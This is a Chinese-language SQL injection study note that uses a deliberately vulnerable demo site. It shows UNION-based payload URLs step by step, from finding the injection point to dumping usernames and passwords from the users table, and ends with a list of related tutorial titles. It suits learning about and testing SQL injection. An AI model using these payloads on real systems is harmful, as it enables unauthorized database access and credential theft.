SQL手工注入网站笔记

目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1

1.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=1’
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假条件,回显空白界面

2.猜字段:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11 回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 回显报错
故共有11个字段

3.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11

即可判断,注入点可以为11,7,2,9

4.查询数据库版本:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version()

数据库版本在5.0 以上,则会存在一个information_schema库存放所有表名称。

5.查数据库名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database()

可得知数据库名称为:acuart

6.查表名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables where table_schema=“acuart”
以上默认查数据库中第一个表名
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=“acuart”
查询该数据库中所有表名

7.查表的字段:
根据经验我们可以猜测 账号密码信息放置于users表中。
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_schema=“acuart” and table_name=“users”

8.查询users表中的uname,pass
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,pass,3,4,5,6,uname,8,9,10,11 from users
由此获得账号:test 密码:test

SQL手工注入网站笔记相关推荐

  1. SQL手工注入入门级笔记(更新中)

    一.字符型注入 针对如下php代码进行注入: $sql="select user_name from users where name='$_GET['name']'"; 正常访问 ...

  2. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  3. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  4. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  5. python sql注入脚本_python辅助sql手工注入猜解数据库案例分析

    发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...

  6. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  7. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  8. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  9. SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...

最新文章

  1. 一文告诉你,大数据在智慧医疗领域发挥的作用
  2. 备战2020腾讯广告算法大赛:(2017-2019比赛开源和数据等)
  3. python从2.6升到2.7后 桌面输入法图标不见
  4. 安全——《微服务设计》读书笔记
  5. python备份目录下文件夹_Python备份目录及目录下的全部内容的实现方法
  6. 结构型设计模式 (1)—— 适配器模式(Adapter Pattern)
  7. [LeetCode][easy]Reformat The String
  8. Windows系统冗余log的清理bat脚本
  9. Redis 雪崩和击穿
  10. 函数信号发生器的功能介绍
  11. 【锋迷商城】01数据库设计
  12. 领先一步,步步领先:编程教育已进入中小学生课堂
  13. jupyter修改工作路径提示找不到指定模块
  14. 蔷薇灵动或成为云安全领域“独角兽”?
  15. 极客日报:字节跳动辟谣“出售AI技术”和“成立打车项目”;GitHub 因代码版权问题遭抵制;贝佐斯正式卸任亚马逊 CEO
  16. 利用开源工具搭一套汉英翻译系统(一):预处理工具
  17. 手把手教你用CS1802A开卡工具和MAS0902量产工具开卡CS1802A+镁光PFH18 N18颗粒
  18. java -jar 包编译在线工具
  19. KYC (Know Your Customer) 详述篇(上)
  20. 手把手教你安装虚拟机(官网下载VMware)

热门文章

  1. java中scanner中nextint,Java Scanner nextInt()方法
  2. 【C语言】【26】switch运用
  3. win台式找不到计算机管理,win10系统打开计算机管理提示windows找不到文件computer management.lnk的具体方案...
  4. mysql怎么写数据存储过程_数据库存储过程要怎么写
  5. 5.SQL数据库存储过程操作
  6. 【命理数学】六十甲子表为什么是六十呢
  7. 装饰者模式及其在 Android Context 中的应用
  8. FreeBSD 下载 Exif扩展
  9. 双色Hanoi塔问题-递归
  10. Datawhale 零基础入门数据挖掘心跳信号分类学习反馈04